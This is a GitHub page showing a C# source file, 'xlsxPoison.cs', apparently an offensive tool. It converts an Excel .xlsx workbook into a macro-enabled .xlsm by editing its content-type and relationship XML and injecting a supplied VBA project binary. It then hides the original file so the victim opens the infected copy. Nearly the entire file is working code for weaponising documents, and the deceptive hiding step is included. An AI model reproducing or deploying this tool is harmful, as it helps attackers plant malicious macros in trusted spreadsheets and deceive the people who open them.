-
Notifications
You must be signed in to change notification settings - Fork 24
/
Copy pathxlsxPoison.cs
47 lines (39 loc) · 2.09 KB
/
xlsxPoison.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
using System;
using System.IO;
using System.IO.Compression;
namespace xlsInfector
{
class Infector
{
static void Main(string[] args)
{
// Temporary folders & files
string workingPath = Environment.GetEnvironmentVariable("LOCALAPPDATA") + "\\Microsoft\\Office\\";
string workingPathTmp = workingPath + "InfectionLab\\";
string infectedFile = args[0].Replace(".xlsx", ".xlsm");
// Patterns
string bin = "<Default ContentType=\"application/vnd.ms-office.vbaProject\" Extension=\"bin\" /></Types>";
string override_bad = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml";
string override_good = "application/vnd.ms-excel.sheet.macroEnabled.main+xml";
string rels = "<Relationship Target=\"vbaProject.bin\" Type=\"http://schemas.microsoft.com/office/2006/relationships/vbaProject\" Id=\"rId99999\"/></Relationships>";
// Extract XLSX contents
ZipFile.ExtractToDirectory(args[0], workingPathTmp);
// Fix files
string content_types = File.ReadAllText(workingPathTmp + "[Content_Types].xml");
content_types = content_types.Replace("</Types>", bin).Replace(override_bad, override_good);
File.WriteAllText(workingPathTmp + "[Content_Types].xml", content_types);
string xl_rels = File.ReadAllText(workingPathTmp + "xl\\_rels\\workbook.xml.rels");
xl_rels = xl_rels.Replace("</Relationships>", rels);
File.WriteAllText(workingPathTmp + "xl\\_rels\\workbook.xml.rels", xl_rels);
// Copy the macro
File.Copy(args[1], workingPathTmp + "xl\\vbaProject.bin");
// Create the XLSM file
ZipFile.CreateFromDirectory(workingPathTmp, infectedFile, CompressionLevel.Fastest, false);
// Hide original
File.SetAttributes(args[0], File.GetAttributes(args[0]) | FileAttributes.Hidden);
// Clean up
DirectoryInfo dir = new DirectoryInfo(workingPathTmp);
dir.Delete(true);
}
}
}